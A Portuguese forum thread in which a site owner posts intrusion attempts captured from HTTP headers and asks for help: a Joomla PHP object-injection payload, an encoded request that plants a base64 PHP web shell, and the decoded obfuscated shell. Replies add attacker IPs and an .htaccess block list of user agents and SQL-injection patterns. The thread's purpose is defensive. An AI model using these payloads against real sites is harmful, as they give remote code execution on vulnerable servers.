# Encontrei isso em meus logs de errors, uma tentativa de hack?

Tags: php, javascript, html, mysql, sql

> Encontrei isso em meus logs de erros e pesquisa de segurança, ainda
>   vou estudar, mas quem sabe alguém já viu?

1 tentativa

**Os códigos foram capturados a partir de uma conexão e pegos na GLOBAL $_SERVER do PHP com os valores nos índices HTTP_USER_AGENT e HTTP_REFERER :**

**o código a seguir foi recebido como user-agent:**

```
}__test|O:21:&#34;JDatabaseDriverMysqli&#34;:3:{s:2:&#34;fc&#34;;O:17:&#34;JSimplepieFactory&#34;:0:{}s:21:&#34;\\0\\0\\0disconnectHandlers&#34;;a:1:{i:0;a:2:{i:0;O:9:&#34;SimplePie&#34;:5:{s:8:&#34;sanitize&#34;;O:20:&#34;JDatabaseDriverMysql&#34;:0:{}s:8:&#34;feed_url&#34;;s:46:&#34;eval($_REQUEST[1]);JFactory::getConfig();exit;&#34;;s:19:&#34;cache_name_function&#34;;s:6:&#34;assert&#34;;s:5:&#34;cache&#34;;b:1;s:11:&#34;cache_class&#34;;O:20:&#34;JDatabaseDriverMysql&#34;:0:{}}i:1;s:4:&#34;init&#34;;}}s:13:&#34;\\0\\0\\0connection&#34;;b:1;}?
```

**o código a seguir foi recebido como user-referer:**

```
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
```

**ip**: 178.219.243.167

178.219.243.167 UA  Sevastopol,
Sebastopol City,
Ukraine,
Europe  90022   44.5888,
33.5224 500 Scientific-Industrial Enterprise Myst LLC   Scientific-Industrial Enterprise Myst LLC   sevstar.net

---

2 tentativa agora a pouco

**o código a seguir foi recebido como user-referer:**

```
/?fbclid=IwAR3x4bqG8uS4DfqYdfahS2CSxkAoWFuEn2kmUlysYXaeV7tx77x1Ip4zglo
```

ip: 31.13.115.14

31.13.115.14    US  United States,
North America       37.751,
-97.822 1000    Facebook Ireland Ltd    Facebook

---

3 tentativa agora as 21:48

**o código a seguir foi recebido como user-referer:**

```
__test|O:21:&#34;JDatabaseDriverMysqli&#34;:3:{s:2:&#34;fc&#34;;O:17:&#34;JSimplepieFactory&#34;:0:{}s:21:&#34;\0\0\0disconnectHandlers&#34;;a:1:{i:0;a:2:{i:0;O:9:&#34;SimplePie&#34;:5:{s:8:&#34;sanitize&#34;;O:20:&#34;JDatabaseDriverMysql&#34;:0:{}s:8:&#34;feed_url&#34;;s:46:&#34;eval($_REQUEST[1]);JFactory::getConfig();exit;&#34;;s:19:&#34;cache_name_function&#34;;s:6:&#34;assert&#34;;s:5:&#34;cache&#34;;b:1;s:11:&#34;cache_class&#34;;O:20:&#34;JDatabaseDriverMysql&#34;:0:{}}i:1;s:4:&#34;init&#34;;}}s:13:&#34;\0\0\0connection&#34;;b:1;}?
```

**o código a seguir foi recebido como user-referer:**

```
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD8kX3VVPWNocig5OSkuY2hyKDEwNCkuY2hyKDExNCk7JF9jQz0kX3VVKDEwMSkuJF91VSgxMTgpLiRfdVUoOTcpLiRfdVUoMTA4KS4kX3VVKDQwKS4kX3VVKDM2KS4kX3VVKDk1KS4kX3VVKDgwKS4kX3VVKDc5KS4kX3VVKDgzKS4kX3VVKDg0KS4kX3VVKDkxKS4kX3VVKDQ5KS4kX3VVKDkzKS4kX3VVKDQxKS4kX3VVKDU5KTskX2ZGPSRfdVUoOTkpLiRfdVUoMTE0KS4kX3VVKDEwMSkuJF91VSg5NykuJF91VSgxMTYpLiRfdVUoMTAxKS4kX3VVKDk1KS4kX3VVKDEwMikuJF91VSgxMTcpLiRfdVUoMTEwKS4kX3VVKDk5KS4kX3VVKDExNikuJF91VSgxMDUpLiRfdVUoMTExKS4kX3VVKDExMCk7JF89JF9mRigiIiwkX2NDKTtAJF8oKTs/Pg%3D%3D%27%29%29%3Becho%20%27%7C%3C-%27%3B
```

**Decifrando o valor vindo em BASE64 o resultado é o seguinte:**

```
<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>
```

> Não faço a minima ideia do que esse script php acima faz!

**ip**: 142.93.52.63

142.93.52.63    US  North Bergen,
New Jersey,
United States,
North America   07047   40.793,
-74.0247    1000    Digital Ocean   Digital Ocean       501

---

**Não irei bloquear o ip por motivos de pesquisa...**

> Qual seria as melhores providencias a tomar para esses ips?

---

> Pela pesquisa que fiz esse ataque funciona nas plataformas que usam
>   Joomla, fica dica pra quem usa!

Por favor ajudem a manter a internet um local seguro! =D

Comment: Ess IP atualmente é da cidade de Sevastopol na Ukraine, então provavelmente sim. Imagnino que não tenha muitos usuários acessando sua aplicação da europa

Comment: @Costamilam isso, eu fiz uma pesquisa de geoip para identificar e salvei os dados para tomar as providencias necessárias.

Comment: Assumindo que você tem htaccess habilitado em sua hospedagem, poderia fazer um filtro de user-agents e sqlmap também, assim não protege 100% mas evita muitos outros problemas com desocupados.

Comment: @EliseuB. Eu tenho filtro e .htaccess sim, filtro sql e uma checagem de char por char, acredito que ele terá que tentar muito ainda e o sistema ta em teste, deve ser boot.

Comment: Esse *ip*  `178.219.243.167` é de um proxy anonimo `178.219.243.167, 61746, UA, Ukraine, Socks4, Anonymous, Yes, 1 minute ago`.

Comment: @AugustoVasques boa mano, não sabia, então não adianta bloquear, é isso?

Comment: Descobri algumas coisas desse cracker, baladarin3@gmail.com, neste link com mesmo attack feito aqui.. https://security.stackexchange.com/questions/117433/i-think-my-site-was-hacked-can-someone-explain-the-get-http-1-0-garbage-in, tenta carregar 4 arquivos a parti deste link tambem, pastebin.com/raw/vdU1gPBk... tinha que prender uma cara desse =D

Answer (score -1):

Como não é possível publicar isso no comentário, segue uma lista de htaccess que talvez possa agregar algo para sua serventia.

```
##### Block directory browsing  -- END
##########################################
##### Redirect Linux Programs/Commands Used By Hackers and Spammers To Honeypot -- START
RewriteCond %{REQUEST_URI} !honeypot.php/
RewriteCond %{HTTP_USER_AGENT} ^.*Wget* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*curl* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*apache* [NC]
RewriteRule ^(.*)$ /honeypot.php/ [NC,L]
##### Redirect Linux Programs/Commands Used By Hackers and Spammers To Honeypot -- END
##########################################
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
############################################################################
############################## CACHE DE ARQUIVOS
#Força a utilizar Cache-Control e Expires header
########## Begin - File injection protection, by SigSiu.net
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
########## End - File injection protection
########## Begin - Basic antispam Filter, by SigSiu.net
## I removed some common words, tweak to your liking
## This code uses PCRE and works only with Apache 2.x.
## This code will NOT work with Apache 1.x servers.
RewriteCond %{QUERY_STRING} \b(ambien|blue\spill|cialis|cocaine|ejaculation|erectile)\b [NC,OR]
RewriteCond %{QUERY_STRING} \b(erections|hoodia|huronriveracres|impotence|levitra|libido)\b [NC,OR]
RewriteCond %{QUERY_STRING} \b(lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby)\b [NC,OR]
RewriteCond %{QUERY_STRING} \b(ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo)\b [NC]
## Note: The final RewriteCond must NOT use the [OR] flag.
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
## Note: The previous lines are a "compressed" version
## of the filters. You can add your own filters as:
## RewriteCond %{QUERY_STRING} \bbadword\b [NC,OR]
## where "badword" is the word you want to exclude.
########## End - Basic antispam Filter, by SigSiu.net
########## Begin - Advanced server protection - query strings, referrer and config
# Advanced server protection, version 3.2 - May 2011
# by Nicholas K. Dionysopoulos
## Disallow PHP Easter Eggs (can be used in fingerprinting attacks to determine
## your PHP version). See http://www.0php.com/php_easter_egg.php and
## http://osvdb.org/12184 for more information
RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
## SQLi first line of defense, thanks to Radek Suski (SigSiu.net) @
## http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
## May cause problems on legitimate requests
RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]
RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
########## Block bad user agents
## The following list may include bots that no longer exist or are not a problem
## for your site. The list will always be incomplete and it is therefore wise to
## follow discussions on one of the many "security" mailing lists or on a forum
## such as http://www.webmasterworld.com/search_engine_spiders/
## It is also unwise to rely on this list as your ONLY security mechanism.
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
## Note: The final RewriteCond must NOT use the [OR] flag.
# Bad bot
SetEnvIfNoCase User-Agent "^abot" bad_bot
SetEnvIfNoCase User-Agent "^aipbot" bad_bot
SetEnvIfNoCase User-Agent "^asterias" bad_bot
SetEnvIfNoCase User-Agent "^EI" bad_bot
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^LWP" bad_bot
SetEnvIfNoCase User-Agent "^lwp" bad_bot
SetEnvIfNoCase User-Agent "^MSIECrawler" bad_bot
SetEnvIfNoCase User-Agent "^nameprotect" bad_bot
SetEnvIfNoCase User-Agent "^PlantyNet_WebRobot" bad_bot
SetEnvIfNoCase User-Agent "^UCmore" bad_bot
SetEnvIfNoCase User-Agent "Alligator" bad_bot
SetEnvIfNoCase User-Agent "AllSubmitter" bad_bot
SetEnvIfNoCase User-Agent "Anonymous" bad_bot
SetEnvIfNoCase User-Agent "Asterias" bad_bot
SetEnvIfNoCase User-Agent "autoemailspider" bad_bot
SetEnvIfNoCase User-Agent "Badass" bad_bot
SetEnvIfNoCase User-Agent "Baiduspider" bad_bot
SetEnvIfNoCase User-Agent "BecomeBot" bad_bot
SetEnvIfNoCase User-Agent "Bitacle" bad_bot
SetEnvIfNoCase User-Agent "bladder\ fusion" bad_bot
SetEnvIfNoCase User-Agent "Blogshares\ Spiders" bad_bot
SetEnvIfNoCase User-Agent "Board\ Bot" bad_bot
SetEnvIfNoCase User-Agent "Board\ Bot" bad_bot
SetEnvIfNoCase User-Agent "Convera" bad_bot
SetEnvIfNoCase User-Agent "ConveraMultiMediaCrawler" bad_bot
SetEnvIfNoCase User-Agent "c-spider" bad_bot
SetEnvIfNoCase User-Agent "DA" bad_bot
SetEnvIfNoCase User-Agent "DnloadMage" bad_bot
SetEnvIfNoCase User-Agent "Download\ Demon" bad_bot
SetEnvIfNoCase User-Agent "Download\ Express" bad_bot
SetEnvIfNoCase User-Agent "Download\ Wonder" bad_bot
SetEnvIfNoCase User-Agent "dragonfly" bad_bot
SetEnvIfNoCase User-Agent "DreamPassport" bad_bot
SetEnvIfNoCase User-Agent "DSurf" bad_bot
SetEnvIfNoCase User-Agent "DTS Agent" bad_bot
SetEnvIfNoCase User-Agent "EBrowse" bad_bot
SetEnvIfNoCase User-Agent "eCatch" bad_bot
SetEnvIfNoCase User-Agent "edgeio" bad_bot
SetEnvIfNoCase User-Agent "Email\ Extractor" bad_bot
SetEnvIfNoCase User-Agent "EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "EmailWolf" bad_bot
SetEnvIfNoCase User-Agent "EmeraldShield" bad_bot
SetEnvIfNoCase User-Agent "ESurf" bad_bot
SetEnvIfNoCase User-Agent "Exabot" bad_bot
SetEnvIfNoCase User-Agent "ExtractorPro" bad_bot
SetEnvIfNoCase User-Agent "FileHeap!\ file downloader" bad_bot
SetEnvIfNoCase User-Agent "FileHound" bad_bot
SetEnvIfNoCase User-Agent "Forex" bad_bot
SetEnvIfNoCase User-Agent "Franklin\ Locator" bad_bot
SetEnvIfNoCase User-Agent "FreshDownload" bad_bot
SetEnvIfNoCase User-Agent "FrontPage" bad_bot
SetEnvIfNoCase User-Agent "FSurf" bad_bot
SetEnvIfNoCase User-Agent "Gaisbot" bad_bot
SetEnvIfNoCase User-Agent "Gamespy_Arcade" bad_bot
SetEnvIfNoCase User-Agent "genieBot" bad_bot
SetEnvIfNoCase User-Agent "GetBot" bad_bot
SetEnvIfNoCase User-Agent "GetRight" bad_bot
SetEnvIfNoCase User-Agent "Gigabot" bad_bot
SetEnvIfNoCase User-Agent "Go!Zilla" bad_bot
SetEnvIfNoCase User-Agent "Go-Ahead-Got-It" bad_bot
SetEnvIfNoCase User-Agent "GOFORITBOT" bad_bot
SetEnvIfNoCase User-Agent "heritrix" bad_bot
SetEnvIfNoCase User-Agent "HLoader" bad_bot
SetEnvIfNoCase User-Agent "HooWWWer" bad_bot
SetEnvIfNoCase User-Agent "HTTrack" bad_bot
SetEnvIfNoCase User-Agent "iCCrawler" bad_bot
SetEnvIfNoCase User-Agent "ichiro" bad_bot
SetEnvIfNoCase User-Agent "iGetter" bad_bot
SetEnvIfNoCase User-Agent "imds_monitor" bad_bot
SetEnvIfNoCase User-Agent "Industry\ Program" bad_bot
SetEnvIfNoCase User-Agent "Indy\ Library" bad_bot
SetEnvIfNoCase User-Agent "InetURL" bad_bot
SetEnvIfNoCase User-Agent "InstallShield\ DigitalWizard" bad_bot
SetEnvIfNoCase User-Agent "IRLbot" bad_bot
SetEnvIfNoCase User-Agent "IUPUI\ Research\ Bot" bad_bot
SetEnvIfNoCase User-Agent "Java" bad_bot
SetEnvIfNoCase User-Agent "jeteye" bad_bot
SetEnvIfNoCase User-Agent "jeteyebot" bad_bot
SetEnvIfNoCase User-Agent "JoBo" bad_bot
SetEnvIfNoCase User-Agent "JOC\ Web\ Spider" bad_bot
SetEnvIfNoCase User-Agent "Kapere" bad_bot
SetEnvIfNoCase User-Agent "Larbin" bad_bot
SetEnvIfNoCase User-Agent "LeechGet" bad_bot
SetEnvIfNoCase User-Agent "LightningDownload" bad_bot
SetEnvIfNoCase User-Agent "Linkie" bad_bot
SetEnvIfNoCase User-Agent "Mac\ Finder" bad_bot
SetEnvIfNoCase User-Agent "Mail\ Sweeper" bad_bot
SetEnvIfNoCase User-Agent "Mass\ Downloader" bad_bot
SetEnvIfNoCase User-Agent "MetaProducts\ Download\ Express" bad_bot
SetEnvIfNoCase User-Agent "Microsoft\ Data\ Access" bad_bot
SetEnvIfNoCase User-Agent "Microsoft\ URL\ Control" bad_bot
SetEnvIfNoCase User-Agent "Missauga\ Locate" bad_bot
SetEnvIfNoCase User-Agent "Missauga\ Locator" bad_bot
SetEnvIfNoCase User-Agent "Missigua Locator" bad_bot
SetEnvIfNoCase User-Agent "Missouri\ College\ Browse" bad_bot
SetEnvIfNoCase User-Agent "Mister\ PiX" bad_bot
SetEnvIfNoCase User-Agent "MovableType" bad_bot
SetEnvIfNoCase User-Agent "Mozi!" bad_bot
SetEnvIfNoCase User-Agent "Mozilla/3.0 (compatible)" bad_bot
SetEnvIfNoCase User-Agent "Mozilla/5.0 (compatible; MSIE 5.0)" bad_bot
SetEnvIfNoCase User-Agent "MSIE_6.0" bad_bot
SetEnvIfNoCase User-Agent "MSIECrawler" badbot
SetEnvIfNoCase User-Agent "MVAClient" bad_bot
SetEnvIfNoCase User-Agent "MyFamilyBot" bad_bot
SetEnvIfNoCase User-Agent "MyGetRight" bad_bot
SetEnvIfNoCase User-Agent "NASA\ Search" bad_bot
SetEnvIfNoCase User-Agent "Naver" bad_bot
SetEnvIfNoCase User-Agent "NaverBot" bad_bot
SetEnvIfNoCase User-Agent "NetAnts" bad_bot
SetEnvIfNoCase User-Agent "NetResearchServer" bad_bot
SetEnvIfNoCase User-Agent "NEWT\ ActiveX" bad_bot
SetEnvIfNoCase User-Agent "Nextopia" bad_bot
SetEnvIfNoCase User-Agent "NICErsPRO" bad_bot
SetEnvIfNoCase User-Agent "NimbleCrawler" bad_bot
SetEnvIfNoCase User-Agent "Nitro\ Downloader" bad_bot
SetEnvIfNoCase User-Agent "Nutch" bad_bot
SetEnvIfNoCase User-Agent "Offline\ Explorer" bad_bot
SetEnvIfNoCase User-Agent "OmniExplorer" bad_bot
SetEnvIfNoCase User-Agent "OutfoxBot" bad_bot
SetEnvIfNoCase User-Agent "P3P" bad_bot
SetEnvIfNoCase User-Agent "PagmIEDownload" bad_bot
SetEnvIfNoCase User-Agent "pavuk" bad_bot
SetEnvIfNoCase User-Agent "PHP\ version" bad_bot
SetEnvIfNoCase User-Agent "playstarmusic" bad_bot
SetEnvIfNoCase User-Agent "Program\ Shareware" bad_bot
SetEnvIfNoCase User-Agent "Progressive Download" bad_bot
SetEnvIfNoCase User-Agent "psycheclone" bad_bot
SetEnvIfNoCase User-Agent "puf" bad_bot
SetEnvIfNoCase User-Agent "PussyCat" bad_bot
SetEnvIfNoCase User-Agent "PuxaRapido" bad_bot
SetEnvIfNoCase User-Agent "Python-urllib" bad_bot
SetEnvIfNoCase User-Agent "RealDownload" bad_bot
SetEnvIfNoCase User-Agent "RedKernel" bad_bot
SetEnvIfNoCase User-Agent "relevantnoise" bad_bot
SetEnvIfNoCase User-Agent "RepoMonkey\ Bait\ &\ Tackle" bad_bot
SetEnvIfNoCase User-Agent "RTG30" bad_bot
SetEnvIfNoCase User-Agent "SBIder" bad_bot
SetEnvIfNoCase User-Agent "script" bad_bot
SetEnvIfNoCase User-Agent "Seekbot" bad_bot
SetEnvIfNoCase User-Agent "SiteSnagger" bad_bot
SetEnvIfNoCase User-Agent "SmartDownload" bad_bot
SetEnvIfNoCase User-Agent "sna-" bad_bot
SetEnvIfNoCase User-Agent "Snap\ bot" bad_bot
SetEnvIfNoCase User-Agent "SpeedDownload" bad_bot
SetEnvIfNoCase User-Agent "Sphere" bad_bot
SetEnvIfNoCase User-Agent "sproose" bad_bot
SetEnvIfNoCase User-Agent "SQ\ Webscanner" bad_bot
SetEnvIfNoCase User-Agent "Stamina" bad_bot
SetEnvIfNoCase User-Agent "Star\ Downloader" bad_bot
SetEnvIfNoCase User-Agent "Teleport" bad_bot
SetEnvIfNoCase User-Agent "TurnitinBot" bad_bot
SetEnvIfNoCase User-Agent "UdmSearch" bad_bot
SetEnvIfNoCase User-Agent "URLGetFile" bad_bot
SetEnvIfNoCase User-Agent "User-Agent" bad_bot
SetEnvIfNoCase User-Agent "UtilMind\ HTTPGet" bad_bot
SetEnvIfNoCase User-Agent "WebAuto" bad_bot
SetEnvIfNoCase User-Agent "WebCapture" bad_bot
SetEnvIfNoCase User-Agent "webcollage" bad_bot
SetEnvIfNoCase User-Agent "WebCopier" bad_bot
SetEnvIfNoCase User-Agent "WebFilter" bad_bot
SetEnvIfNoCase User-Agent "WebReaper" bad_bot
SetEnvIfNoCase User-Agent "Website\ eXtractor" bad_bot
SetEnvIfNoCase User-Agent "WebStripper" bad_bot
SetEnvIfNoCase User-Agent "WebZIP" bad_bot
SetEnvIfNoCase User-Agent "Wells\ Search" bad_bot
SetEnvIfNoCase User-Agent "WEP\ Search\ 00" bad_bot
SetEnvIfNoCase User-Agent "Wget" bad_bot
SetEnvIfNoCase User-Agent "Wildsoft\ Surfer" bad_bot
SetEnvIfNoCase User-Agent "WinHttpRequest" bad_bot
SetEnvIfNoCase User-Agent "WWWOFFLE" bad_bot
SetEnvIfNoCase User-Agent "Xaldon\ WebSpider" bad_bot
SetEnvIfNoCase User-Agent "Y!TunnelPro" bad_bot
SetEnvIfNoCase User-Agent "YahooYSMcm" bad_bot
SetEnvIfNoCase User-Agent "Zade" bad_bot
SetEnvIfNoCase User-Agent "ZBot" bad_bot
SetEnvIfNoCase User-Agent "zerxbot" bad_bot
</IfModule>

# Apache < 2.4
<IfModule !mod_authz_core.c>
    <Limit GET POST>
        Order allow,deny
        Allow from all
        Deny from env=bad_bot
    </Limit>
</IfModule>
# Apache >= 2.4
<IfModule mod_authz_core.c>
    <Limit GET POST>
        <RequireAll>
            Require all granted
            Require not env bad_bot
        </RequireAll>
    </Limit>
</IfModule>
```

Comment: Irei da uma olhada, assim que sobrar um tempo para checar o que pode se encaixar aqui, obrigado!